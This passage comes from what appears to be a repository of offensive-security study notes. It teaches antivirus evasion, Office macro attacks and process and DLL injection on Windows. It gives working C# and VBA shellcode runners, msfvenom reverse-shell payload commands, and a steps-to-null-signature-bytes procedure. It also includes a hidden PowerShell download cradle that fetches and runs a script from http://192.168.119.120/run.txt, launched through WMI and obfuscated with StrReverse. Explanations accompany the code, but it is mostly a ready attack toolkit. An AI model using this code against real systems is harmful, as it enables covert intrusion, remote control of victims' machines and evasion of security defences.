a few bytes of the file, since any change produces a new hash. 24 | 25 | Scanning based on byte strings is much harder to bypass, as we have to find the exact set of bytes which triggers the AV. 26 | 27 | To bypass Signature based scans which look for particular byte strings in the file, we can search for such bytes which trigger the AV and replace them with an alternative. 28 | 29 | To do this, we can split the binary into many pieces and perform scans on each one of them. We can recursively do this to replace all the bytes which trigger the AV with a null byte. Overwriting a byte that is part of executable code will usually break the binary, so prefer bytes inside strings or data and confirm the modified file still runs after every change. We also have to set the last byte to 0xFF to bypass the complete file getting detected. 
30 | 31 | To split the binary, we can use the powershell tool [Find-AVSignature](./../Tools/AV%20Evasion/Find-AVSignature.ps1). Example command :- 32 | 33 | Find-AVSignature -StartByte 0 -EndByte max -Interval 100 -Path mal.exe -OutPath mal_1 -Verbose -Force 34 | 35 | Explanation : 36 | 37 | - We first have to import the module onto our current powershell session using the command . .\Find-AVSignature.ps1 38 | - The StartByte and Endbyte specify the range through which we want to split the binary, here it is from 0 to max. 39 | - The Interval argument sets the intervals in which the file should be split. 40 | - The OutPath specifies the directory to which the split binaries should be stored 41 | 42 | We can then use clamscan on this directory to see which file triggers the AV. Example command :- 43 | 44 | PS C:> .\clamscan.exe mal_1 45 | 46 | We can then slowly narrow our search and reduce the interval as we go. To replace the bytes we can use the powershell command :- 47 | 48 | $bytes = [System.IO.File]::ReadAllBytes("mal.exe") 49 | $bytes[1111] = 0 50 | [System.IO.File]::WriteAllBytes("mal_mod.exe", $bytes) 51 | 52 | Explanation : 53 | 54 | - Suppose at byte 1111, the AV was getting triggered. 55 | - We would first convert the whole binary into bytes and store it in a variable 56 | - We then would replace the location with a 0 57 | - Now we would write the bytes into a new file 58 | - Splitting and passing this through clamscan again, the byte would not trigger the AV. 59 | 60 |   61 | 62 | # Bypassing AV with Metasploit 63 | 64 | ## Encoders 65 | 66 | We can use encoders in metasploit while creating our payload to bypass Signature Based Detection. These are a wide range encoders offered by metasploit. We can list all the encoders using this command :- 67 | 68 | msfvenom -l encoders 69 | 70 | _shikata_ga_nai_ is a famous encoder, but it is only made for 32-bit systems. 
For 64-bit systems we can use _zutto_dekiru_ which is similar to _shikata_ga_nai_ 71 | 72 | The commands for the above encoders are given below : 73 | 74 | msfvenom -p windows/meterpreter/reverse_https LHOST= LPORT= -e x86/shikata_ga_nai -f exe -o met_shikata.exe 75 | 76 | msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT= -e x64/zutto_dekiru -f exe -o met_zekiro.exe 77 | 78 | > We can also add the **-i** option to specify the number of iterations the encoder will run. 79 | > The **-x** option can be used to supply an existing executable as a template for the output file. 80 | 81 | **NOTE** : As of now, encoders are mainly used to get around bad characters in a shellcode and serve little purpose in bypassing AntiVirus: the decoder stub they prepend is itself static and well known, and modern AV solutions typically either signature the stub or emulate the decoding and scan the result. 82 | 83 | > RESOURCES 84 | > 85 | > - https://danielsauder.com/2015/08/26/an-analysis-of-shikata-ga-nai/ 86 | > - https://www.boozallen.com/insights/cyber/tech/zutto-dekiru-encoder-explained.html 87 | > - https://www.rapid7.com/blog/post/2012/12/14/the-odd-couple-metasploit-and-antivirus-solutions/ 88 | 89 |   90 | 91 | ## Encrypters 92 | 93 | We can list the encrypters offered by metasploit with the following command: 94 | 95 | msfvenom -l encrypt 96 | 97 | A sample command using an encrypter (the key is passed after **--encrypt-key**) : 98 | 99 | msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT= --encrypt aes256 --encrypt-key -f exe -o mal_aes.exe 100 | 101 | This will however still get detected: the decryption routine prepended by msfvenom is static and well known, and the key ships inside the file, so heuristic scans (or simply emulating the decryption) can easily find out that the file contains malware. 
102 | 103 | > RESOURCES 104 | > 105 | > - https://www.offensive-security.com/metasploit-unleashed/msfvenom/ 106 | > - https://www.rapid7.com/blog/post/2018/05/03/hiding-metasploit-shellcode-to-evade-windows-defender/ 107 | > - https://www.rapid7.com/blog/post/2019/11/21/metasploit-shellcode-grows-up-encrypted-and-authenticated-c-shells/ 108 | 109 |   110 | 111 | # Bypassing AV with C# 112 | 113 | ## Caesar cipher with XOR-based and AND-based encryption 114 | 115 | Let us take a custom written simple C# shellcode runner. 116 | 117 | You can find the program [here](./C%23%20Programs/ShellcodeRunner.cs) 118 | 119 | Explanation : 120 | 121 | - We create a simple C# shellcode runner which uses the Win32 APIs. 122 | - We first allocate space, copy the shellcode into it and then execute it. 123 | - The _WaitForSingleObject_ API waits so that the process does not exit (and take the shell with it) as soon as the shell is created. 124 | - Detailed explanation of different APIs can be found [here](./../Client-Side-Code-Execution-With-Office/README.md#in-memory-shellcode-runner-in-vba) 125 | 126 | We have encrypted it with a Caesar cipher along with XOR based encryption. You can find the code [here](./C%23%20Programs/XorEncoder.cs). Note that this is obfuscation rather than real cryptography: the fixed key ships inside the binary, so it only defeats static signatures on the shellcode bytes, and the decoded shellcode is still plain in memory once the runner executes. 127 | 128 | The same program but with simple Caesar cipher can be found [here](./C%23%20Programs/CaesarEncoder.cs) 129 | 130 |   131 | 132 | > RESOURCES 133 | > 134 | > - https://en.wikipedia.org/wiki/XOR_cipher 135 | > - http://practicalcryptography.com/ciphers/caesar-cipher/ 136 | 137 |   138 | 139 | ## Sleep Timers 140 | 141 | To add on to the above encryption methods, we can also add sleep timers to interfere with heuristic based detection. This can easily be implemented using the _Sleep_ Win32 API from _kernel32.dll_ 142 | 143 | Simple implementation of _Sleep_ Win32 API :- 144 | 145 | ... 
146 | [DllImport("kernel32.dll")] 147 | static extern void Sleep(uint dwMilliseconds); 148 | 149 | static void Main(string[] args) 150 | { 151 | DateTime t1 = DateTime.Now; 152 | Sleep(5000); 153 | double t2 = DateTime.Now.Subtract(t1).TotalSeconds; 154 | if(t2 < 5) 155 | { 156 | return; 157 | } 158 | } 159 | ... 160 | 161 | Explanation : 162 | 163 | - We first use a P/Invoke declaration to import the API 164 | - We fetch the current time and store it in variable t1 165 | - We then call the _Sleep_ API with 5000 ms (5 sec) as its argument 166 | - We then get the current time again, subtract t1 from it and store the elapsed seconds in t2 167 | - If t2 is less than 5 seconds, the sleep was skipped or shortened, so we exit without running the rest of the program. 168 | - Some AV emulators skip or fast-forward Sleep calls so that delays do not stall the scan; measuring elapsed wall-clock time around the call detects exactly that. An emulator that also fakes the clock will pass this check, which is why it is only a weak signal on its own. 169 | 170 | > Sleep timers aren't as effective as they used to be. It's a plus point to integrate this into the program but effectiveness cannot be guaranteed. 171 | 172 | > RESOURCES 173 | > 174 | > - https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-sleep 175 | > - https://docs.microsoft.com/en-us/dotnet/api/system.datetime?view=netframework-4.8 176 | 177 |   178 | 179 | ## Non-Emulated APIs 180 | 181 | AV emulators simulate only the most common APIs; an API they do not implement cannot be executed, so emulation typically fails the call or aborts at that point. 182 | A simple example is _VirtualAllocExNuma_ (the NUMA suffix lets the caller prefer a NUMA node on multi-processor systems), which we can use instead of _VirtualAllocEx_ . 
183 | 184 | Function prototype of **_VirtualAllocEx_** : 185 | 186 | LPVOID VirtualAllocEx( 187 | HANDLE hProcess, 188 | LPVOID lpAddress, 189 | SIZE_T dwSize, 190 | DWORD flAllocationType, 191 | DWORD flProtect 192 | ); 193 | 194 | Function prototype of **_VirtualAllocExNuma_** : 195 | 196 | LPVOID VirtualAllocExNuma( 197 | HANDLE hProcess, 198 | LPVOID lpAddress, 199 | SIZE_T dwSize, 200 | DWORD flAllocationType, 201 | DWORD flProtect, 202 | DWORD nndPreferred 203 | ); 204 | 205 | The only difference is the extra argument _nndPreferred_ in _VirtualAllocExNuma_ which specifies the NUMA node where the physical memory should reside. We can set this option to "0" to use the first node. 206 | 207 | P/Invoke statement : 208 | 209 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 210 | static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred); 211 | 212 |   213 | 214 | Code to check for AV Sandbox : 215 | 216 | ... 217 | [DllImport("kernel32.dll")] 218 | static extern IntPtr GetCurrentProcess(); 219 | 220 | IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0); 221 | if(mem == null) 222 | { 223 | return; 224 | } 225 | ... 226 | 227 | Explanation : 228 | 229 | - We first import the Win32 API for _VirtualAllocExNuma_ and the _GetCurrentProcess_ 230 | - We then try to allocate one page of plain read/write memory in our own process with the API (0x3000 is MEM_COMMIT | MEM_RESERVE, 0x4 is PAGE_READWRITE — no executable memory is needed for the probe) 231 | - If an AV emulator does not implement the API, the call fails and VirtualAllocExNuma returns NULL. Note that `IntPtr` is a C# value type and can never be `null`, so the `mem == null` test above is always false and never fires; write the check as `if (mem == IntPtr.Zero) { return; }` for it to work. 
232 | - In this case the program would stop execution before the payload runs 233 | 234 |   235 | 236 | > RESOURCES 237 | > 238 | > - https://docs.microsoft.com/en-gb/windows/win32/procthread/numa-support 239 | > - https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocexnuma 240 | > - https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-getcurrentprocess 241 | 242 |   243 | 244 | # AV Bypass with Office 245 | 246 | ## AV Bypass with VBA 247 | 248 | A simple Shellcode Runner macro can be found [here](./VBA%20Scripts/ShellcodeRunner.vba) 249 | 250 | Explanation : 251 | 252 | - We first import the necessary Win32 APIs 253 | - We store the shellcode buffer in a variable and then allocate a buffer space in the memory with the help of _VirtualAlloc_ 254 | - Next we copy byte by byte of our shellcode to the allocated buffer and then execute it 255 | - Document_Open and AutoOpen run the macro as soon as the document is opened, with no further interaction — but only once macros are allowed to run: the user has to leave Protected View and click Enable Content (or the file has to come from a trusted location), and current Office builds block macros outright in files that carry the Mark-of-the-Web. 256 | 257 | For encrypting this shellcode, we will use the same Caesar Cipher encryption routine. The program to encrypt the shellcode can be found [here](./C%23%20Programs/vba_encrypt.cs) 258 | 259 | Explanation : 260 | 261 | - We first take in the shellcode and create a variable array with the same length 262 | - We then add 2 to each byte and AND the result with 0xFF, so that the value wraps around instead of exceeding one byte. 263 | - The next for loop converts the bytes into decimals after which it prints out the payload. 264 | 265 | We can also add sleep commands in our vba script to bypass time-lapse detection implemented by AV. 266 | 267 | Code Snippet : 268 | 269 | Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long 270 | ... 
271 | Dim t1 As Date 272 | Dim t2 As Date 273 | Dim time As Long 274 | 275 | t1 = Now() 276 | Sleep (2000) 277 | t2 = Now() 278 | time = DateDiff("s", t1, t2) 279 | 280 | If time < 2 Then 281 | Exit Function 282 | End If 283 | ... 284 | 285 | Explanation : 286 | 287 | - We first fetch the current time, sleep for 2 seconds, fetch it again and let DateDiff compute the elapsed seconds 288 | - If the AV emulator skips or shortens the Sleep, the elapsed time comes out below 2 seconds; in that case we assume we are in a sandbox and exit without running the rest of the macro. 289 | 290 | > RESOURCES 291 | > 292 | > - https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/now-function 293 | > - https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/datediff-function 294 | > - https://www.c-sharpcorner.com/article/caesar-cipher-in-c-sharp/ 295 | 296 |   297 | 298 | ## VBA Stomping 299 | 300 | We can use [FlexHex](http://www.flexhex.com/) to unwrap a .doc file. This would help us to look into the structure, files and metadata. 301 | 302 | Newer Word and Excel documents using the modern macro-enabled formats are zip containers and can be unzipped with 7zip. 303 | 304 | **P-code** is a compiled version of the textual VBA code, specific to the version of Microsoft Office and VBA it was created on. 305 | 306 | This means that if we remove the textual VBA code and leave the P-code as it is, then even though the VBA source is absent, if the file is opened on the same Microsoft Office version our compiled code would run and give us a shell. On any other version the P-code is discarded and the (now empty) source is recompiled, so nothing runs — stomping only works against a known target build. 307 | 308 | The version for which the P-code is made can be found in the \_VBA_Project file when opened in FlexHex. 309 | 310 | In the hex editor we can select from Attribute VB_Name to the end and replace them with null bytes. This would essentially remove our VBA code but the compiled P-code would still remain. 311 | 312 | A scanner that only reads the VBA source would see that the VBA is empty and not flag it; scanners that decompile the P-code and compare it against the source can still detect the mismatch. 
When opened on the matching version of Microsoft Office, the P-code is executed and we get our shell; additionally, Office regenerates the VBA source from the P-code and writes it back into the document. 313 | 314 | This is known as VBA Stomping: we remove the textual VBA code and leave the compiled P-code in place. 315 | 316 |   317 | 318 | > RESOURCES 319 | > 320 | > - https://github.com/clr2of8/Presentations/blob/master/DerbyCon2018-VBAstomp-Final-WalmartRedact.pdf 321 | > - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-cfb/53989ce4-7b05-4f8d-829b-d08d6148375b 322 | > - https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239 323 | > - https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/c66b58a6-f8ba-4141-9382-0612abce9926 324 | 325 |   326 | 327 | ## Powershell in VBA 328 | 329 | Code snippet : 330 | 331 | Sub MyMacro() 332 | Dim strArg As String 333 | strArg = "powershell -exec bypass -nop -c iex((new-object system.net.webclient).downloadstring('http://192.168.119.120/run.txt'))" 334 | Shell strArg, vbHide 335 | End Sub 336 | 337 | Explanation : 338 | 339 | - We first declare the variable to store our powershell command. 340 | - We then execute it using the _Shell_ command with the variable as the argument, followed by vbHide to hide the command prompt window. 341 | 342 | Problems : 343 | 344 | - Even though this is only the download cradle for our main shellcode, it gets flagged because powershell.exe is spawned as a direct child of the Office process — the Office-to-PowerShell parent/child relationship is a well-known indicator that AV and EDR heuristics specifically look for. 345 | - We can break that parent/child chain with the help of WMI (Windows Management Instrumentation) 346 | 347 |   348 | 349 | ## Dechaining with WMI 350 | 351 | WMI is a long-standing native component of the Windows Operating System. Its Win32_Process class can create a process on our behalf, so we can use it to start powershell as a separate process that is not a child of Office. 
352 | 353 | Code : 354 | 355 | Sub MyMacro 356 | strArg = "powershell -exec bypass -nop -c iex((new-object system.net.webclient).downloadstring('http://192.168.119.120/run.txt'))" 357 | GetObject("winmgmts:").Get("Win32_Process").Create strArg, Null, Null, pid 358 | End Sub 359 | 360 | Sub AutoOpen() 361 | Mymacro 362 | End Sub 363 | 364 | Explanation : 365 | 366 | - The strArg variable stores the powershell command for the download cradle. 367 | - We then call Win32_Process.Create through WMI, which starts powershell as a separate process and runs the command in it. 368 | - Because the new process is created by the WMI provider host rather than by Office, the Office-to-PowerShell parent/child chain that heuristic scans look for is broken. The command line is still recorded by process-creation logging and the downloaded script is still subject to AMSI when it runs, so this removes only one indicator. 369 | - The AutoOpen function executes the macro as soon as the document is opened (once macros are enabled). 370 | 371 |   372 | 373 | ## Obfuscating VBA 374 | 375 | We can now move on to obfuscating the VBA so that it is not picked up by static AV signatures. 376 | 377 | ### String Reverse 378 | 379 | Code : 380 | 381 | Sub Mymacro() 382 | Dim strArg As String 383 | strArg = StrReverse("))'txt.nur/021.911.861.291//:ptth'(gnirtsdaolnwod.)tneilcbew.ten.metsys tcejbo-wen((xei c- pon- ssapyb cexe- llehsrewop") 384 | GetObject(StrReverse(":stmgmniw")).Get(StrReverse("ssecorP_23niW")).Create strArg, Null, Null, pid 385 | End Sub 386 | 387 | Explanation : 388 | 389 | - The whole string is stored in reverse, so the literals `powershell`, `winmgmts:` and `Win32_Process` never appear in the macro source. 390 | - StrReverse is VBA's built-in string-reversal function (it is not part of WMI); it restores the original strings at run time just before they are used. 391 | 392 | Other than this, we can also use random variable names and character-code arrays with conversion between them to make static analysis harder. 
393 | 394 |   395 | 396 | > RESOURCES 397 | > 398 | > - https://en.wikipedia.org/wiki/Obfuscation_(software) 399 | > - https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/strreverse-function 400 | > - https://codebeautify.org/reverse-string 401 | -------------------------------------------------------------------------------- /Process Injection and Migration/README.md: -------------------------------------------------------------------------------- 1 | # Process Injection 2 | 3 | ## Process Injection Theory 4 | 5 | Process : A container that is created to house a running application. Each Windows process maintains its own virtual address space; interaction between these spaces takes place through Win32 APIs 6 | 7 | Thread : Executes the compiled code of an application. A process can have multiple threads; each thread has its own stack and shares the memory of the process. 8 | 9 | Win32 APIs : _OpenProcess_ , _VirtualAllocEx_ , _WriteProcessMemory_ and _CreateRemoteThread_. 10 | 11 | > All processes have an **Integrity level**. A process can open and modify processes of equal or lower integrity, but not higher ones; this mandatory integrity control is what stops a medium-integrity injector from targeting elevated or SYSTEM processes and prevents privilege escalation. 12 | 13 | > We can check the integrity levels : Right click on exe > Properties > Security 14 | 15 |   16 | 17 | ## Process Injection in C# 18 | 19 | We'll be using 4 Win32 APIs from Kernel32.dll - 20 | 21 | - _OpenProcess_ : To obtain a handle to the target process with the access rights we need. 22 | - _VirtualAllocEx_ : To allocate a region in the target's memory space for our shellcode. 23 | - _WriteProcessMemory_ : Write the shellcode to the allocated memory region. 24 | - _CreateRemoteThread_ : To execute the shellcode in a new thread inside the target process. 
25 | 26 |   27 | 28 | Understanding each Function in-depth : 29 | 30 | **_OpenProcess_** 31 | 32 | Function : 33 | 34 | HANDLE OpenProcess( 35 | DWORD dwDesiredAccess, 36 | BOOL bInheritHandle, 37 | DWORD dwProcessId 38 | ); 39 | 40 | Explanation : 41 | 42 | - The first argument _dwDesiredAccess_ is the access right we want to obtain; its value is checked against the target's security descriptor, and the call returns NULL if the caller is not granted those rights (for example when the target runs at a higher integrity level), so the returned handle should be checked before use. 43 | - The second argument _bInheritHandle_ tells if child processes can inherit this handle. If its value is **TRUE**, processes created by this process will inherit this handle. 44 | - The third argument _dwProcessId_ is the Process ID of the process in which we want to inject our shellcode. 45 | 46 | > Documentation : 47 | > 48 | > - https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess 49 | > - https://docs.microsoft.com/en-gb/windows/win32/procthread/process-security-and-access-rights 50 | 51 |   52 | 53 | **_VirtualAllocEx_** 54 | 55 | Function : 56 | 57 | LPVOID VirtualAllocEx( 58 | HANDLE hProcess, 59 | LPVOID lpAddress, 60 | SIZE_T dwSize, 61 | DWORD flAllocationType, 62 | DWORD flProtect 63 | ); 64 | 65 | Explanation : 66 | 67 | - The first argument _hProcess_ is the handle to the target process obtained from OpenProcess. 68 | - The second argument _lpAddress_ is the desired starting address of the allocation; passing NULL lets the system choose a free region. 69 | - The third argument _dwSize_ sets the size of the region to allocate (rounded up to page granularity). 70 | - In our case dwSize must be at least the size of our shellcode buffer. 
71 | - The flAllocationType has the type of memory allocation(Types: MEM_COMMIT, MEM_RESERVE, MEM_RESET, MEM_RESET_UNDO) 72 | - The flProtect has the memory Protections for the allocated memory 73 | 74 | > Documentation : 75 | > 76 | > - https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex 77 | > - https://docs.microsoft.com/en-us/windows/win32/memory/memory-protection-constants 78 | 79 |   80 | 81 | **_WriteProcessMemory_** 82 | 83 | Function : 84 | 85 | BOOL WriteProcessMemory( 86 | HANDLE hProcess, 87 | LPVOID lpBaseAddress, 88 | LPCVOID lpBuffer, 89 | SIZE_T nSize, 90 | SIZE_T *lpNumberOfBytesWritten 91 | ); 92 | 93 | Explanation : 94 | 95 | - The first argument _hProcess_ is the process handle of the victim process. 96 | - The second argument _lpBaseAddress_ is the address of the allocated memory address. 97 | - The third argument _lpBuffer_ is the buffer of the shellcode. 98 | - The fourth argument _nSize_ is the size of the buffer. 99 | - The fifth argument _\*lpNumberOfBytesWritten_ is the pointer to a variable that recieves the number of bytes transferred. If set to NULL, the parameter is ignored. 100 | 101 | > Documentation : 102 | > 103 | > - https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory 104 | 105 |   106 | 107 | **_CreateRemoteThread_** 108 | 109 | Function : 110 | 111 | HANDLE CreateRemoteThread( 112 | HANDLE hProcess, 113 | LPSECURITY_ATTRIBUTES lpThreadAttributes, 114 | SIZE_T dwStackSize, 115 | LPTHREAD_START_ROUTINE lpStartAddress, 116 | LPVOID lpParameter, 117 | DWORD dwCreationFlags, 118 | LPDWORD lpThreadId 119 | ); 120 | 121 | Explanation : 122 | 123 | - The first argument _hProcess_ is the process handle of the victim process. 124 | - The second argument _lpThreadAttributes_ is the desired security attributes 125 | - The third argument is the initial size of the stack, we can set it to 0 to use the default values. 
126 | - The fourth argument _lpStartAddress_ is the starting address of the thread (address of the allocated buffer). 127 | - The fifth argument _lpParameter_ is the pointer to a variable to be passed to the thread function. 128 | - The sixth argument _dwCreationFlags_ controls the creation of the thread. It can have three values : 0, CREATE_SUSPENDED and STACK_SIZE_PARAM_IS_A_RESERVATION . 129 | - The seventh argument _lpThreadId_ is a pointer to a variable that receives the thread identifier. If this parameter is NULL, the thread identifier is not returned. 130 | 131 | > Documentation : 132 | > 133 | > - https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread 134 | 135 |   136 | 137 | MSFVENOM COMMAND : 138 | 139 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f csharp EXITFUNC=thread 140 | 141 |   142 | 143 | Final Code : 144 | 145 | using System; 146 | using System.Runtime.InteropServices; 147 | namespace Inject 148 | { 149 | class Program 150 | { 151 | 152 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 153 | static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId); 154 | 155 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 156 | static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 157 | 158 | [DllImport("kernel32.dll")] 159 | static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten); 160 | 161 | [DllImport("kernel32.dll")] 162 | static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 163 | 164 | static void Main(string[] args) 165 | { 166 | 167 | IntPtr hProcess = OpenProcess(0x001F0FFF, false, 4804); 168 | IntPtr addr = 
VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40); 169 | byte[] buf = new byte[591] {0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x0a,0x41,0x89,0xda,0xff,0xd5 }; 170 | IntPtr outSize; 171 | WriteProcessMemory(hProcess, addr, buf, buf.Length, out outSize); 172 | IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero); 173 | } 174 | } 175 | } 176 | 177 |   178 | 179 | Explanation : 180 | 181 | - We first import the System and the interop classes to interact with the APIs and other functions. 182 | - Next we specify the namespace followed by the class inside it. 183 | - The following statements are DllImports which import the Win32 APIs from Kernel32. These can be obtained from [pinvoke](https://pinvoke.net) 184 | - Next is the Main function inside which we write our code. 185 | - We open a handle to the target process using the _OpenProcess_ API. The first argument, 0x001F0FFF, is PROCESS_ALL_ACCESS in hexadecimal — far more than injection needs (PROCESS_VM_OPERATION, PROCESS_VM_WRITE, PROCESS_CREATE_THREAD and PROCESS_QUERY_INFORMATION suffice) and a louder request for defenders to notice; the second argument specifies if child processes can inherit this handle. The third argument is the process ID of the victim process; 4804 is hard-coded here and must be replaced with the real PID of the target. We store the handle in the hProcess variable — if the call fails (wrong PID, or a target at higher integrity) it is IntPtr.Zero and none of the following calls will work, so check it before continuing. 186 | - Now we allocate the space in the process using _VirtualAllocEx_. The first argument specifies the process handle, the second argument is set to zero so that the API can select an unused address. The third, fourth and fifth arguments are the size, type of allocation and protections of the allocated memory. 0x1000 is 4096 bytes (one page), not 1000 — the shellcode must fit inside it, so using buf.Length here ties the allocation to the real payload size; 0x3000 specifies MEM_COMMIT and MEM_RESERVE and 0x40 is PAGE_EXECUTE_READWRITE, i.e. read, write and execute on the allocated space (an RWX allocation in a remote process is itself a common detection heuristic). 187 | - We then define the buf variable which stores the shellcode generated by msfvenom. The initializer shown is truncated: C# requires the declared length (591) to match the number of bytes listed, so paste the full msfvenom output or drop the explicit length. 188 | - The _WriteProcessMemory_ takes 5 arguments. 189 | - The first argument specifies the process handle. 190 | - The second argument is the address of the allocated space 191 | - The third argument is the shellcode buffer. 
192 | - The fourth argument is the size of the shellcode buffer. 193 | - The fifth argument receives the number of bytes actually written. It is declared **out** because the API expects a pointer to a variable, which also matches the function prototype. WriteProcessMemory returns false on failure and outSize should equal buf.Length, which is worth checking before creating the thread. 194 | - In _CreateRemoteThread_, every argument except the first and the fourth is NULL or 0, so the API uses its defaults (default security attributes and stack size, no thread parameter, thread started immediately, thread ID not returned). 195 | - The first argument specifies the process handle created. 196 | - The fourth argument specifies the address of the allocated memory, which becomes the start routine of the new thread. 197 | 198 | > Documentation : 199 | > 200 | > - https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/keywords/out-parameter-modifier 201 | 202 |   203 | 204 | # DLL Injection 205 | 206 | ## DLL Injection Theory 207 | 208 | - To use an API from a DLL, we have to use the LoadLibrary API to load the DLL into the process's virtual memory space. 209 | - The LoadLibraryA function takes only one argument, which is the name (or path) of the DLL. 210 | - Function prototype of LoadLibraryA : 211 | 212 | HMODULE LoadLibraryA( 213 | LPCSTR lpLibFileName 214 | ); 215 | 216 | - LoadLibrary cannot be called directly in a remote process, but our workaround is to resolve its address in our own process using _GetProcAddress_ and _GetModuleHandle_. Since kernel32.dll is mapped at the same base address in every process for the lifetime of a boot (ASLR re-randomises system DLL bases per boot, not per process), the address of LoadLibraryA is the same in our current and the remote process. This only holds when both processes have the same bitness — a 64-bit injector's address is meaningless inside a 32-bit target. 
217 | - We can then pass this address along with the allocated dll as the argument 218 | 219 |   220 | 221 | ## DLL Injection in C# 222 | 223 | MSFVENOM Payload : 224 | 225 | sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT= -f dll -o shell.dll 226 | 227 | Final Code : 228 | 229 | using System; 230 | using System.Diagnostics; 231 | using System.Net; 232 | using System.Runtime.InteropServices; 233 | using System.Text; 234 | 235 | namespace Inject 236 | { 237 | class Program 238 | { 239 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 240 | static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId); 241 | 242 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 243 | static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 244 | 245 | [DllImport("kernel32.dll")] 246 | static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten); 247 | 248 | [DllImport("kernel32.dll")] 249 | static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 250 | 251 | [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] 252 | static extern IntPtr GetProcAddress(IntPtr hModule, string procName); 253 | 254 | [DllImport("kernel32.dll", CharSet = CharSet.Auto)] 255 | public static extern IntPtr GetModuleHandle(string lpModuleName); 256 | 257 | static void Main(string[] args) 258 | { 259 | String dir = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments); 260 | String dllName = dir + "\\shell.dll"; 261 | WebClient wc = new WebClient(); 262 | wc.DownloadFile("", dllName); 263 | Process[] expProc = Process.GetProcessesByName("explorer"); 264 | int pid = expProc[0].Id; 265 | IntPtr 
hProcess = OpenProcess(0x001F0FFF, false, pid); 266 | IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40); 267 | IntPtr outSize; 268 | Boolean res = WriteProcessMemory(hProcess, addr, Encoding.Default.GetBytes(dllName), dllName.Length, out outSize); 269 | IntPtr loadLib = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); 270 | IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, loadLib, addr, 0, IntPtr.Zero); 271 | } 272 | } 273 | } 274 | 275 |   276 | 277 | Explanation : 278 | 279 | - We first import the System and interop namespaces to interact with the win32 APIs and System classes 280 | - We then define a namespace called Inject followed by a class called Program inside this namespace. 281 | - This is followed by the Pinvoke statements to load the required Win32 APIs 282 | - We then specify the Main method inside which our code is written. 283 | - We get the full system path of the Documents folder and store it in the dir variable. 284 | - We then store the name of the dll with its complete path in dllName 285 | - Next we download the hosted DLL (the URL passed to wc.DownloadFile is a placeholder to fill in) and save it to that path. This writes the DLL to disk, which is exactly the artefact an AV can scan and the reflective approach below avoids. 286 | - To get the process ID of explorer, we use GetProcessesByName and take the Id of the first match (expProc[0] throws if no explorer.exe is running). 287 | - We then open a handle to explorer.exe using _OpenProcess_ 288 | - Using _VirtualAllocEx_ we allocate a buffer in this remote process. The buffer is allocated PAGE_EXECUTE_READWRITE (0x40) although it only ever holds a path string; PAGE_READWRITE (0x4) is sufficient and less suspicious. 289 | - We write the DLL's path — not the DLL itself — into that buffer using the _WriteProcessMemory_ API, converted to ANSI bytes with Encoding.Default because LoadLibraryA expects an ANSI string. LoadLibraryA also expects the string to be NUL-terminated; the code writes no terminator and relies on the freshly committed page being zero-filled to supply it. 290 | - Using _GetProcAddress_ and _GetModuleHandle_ we get the address of LoadLibraryA in our own process, which is valid in the remote process as well. 291 | - We then create a remote thread, but this time the start address is LoadLibraryA and its parameter is the address of the path buffer. The 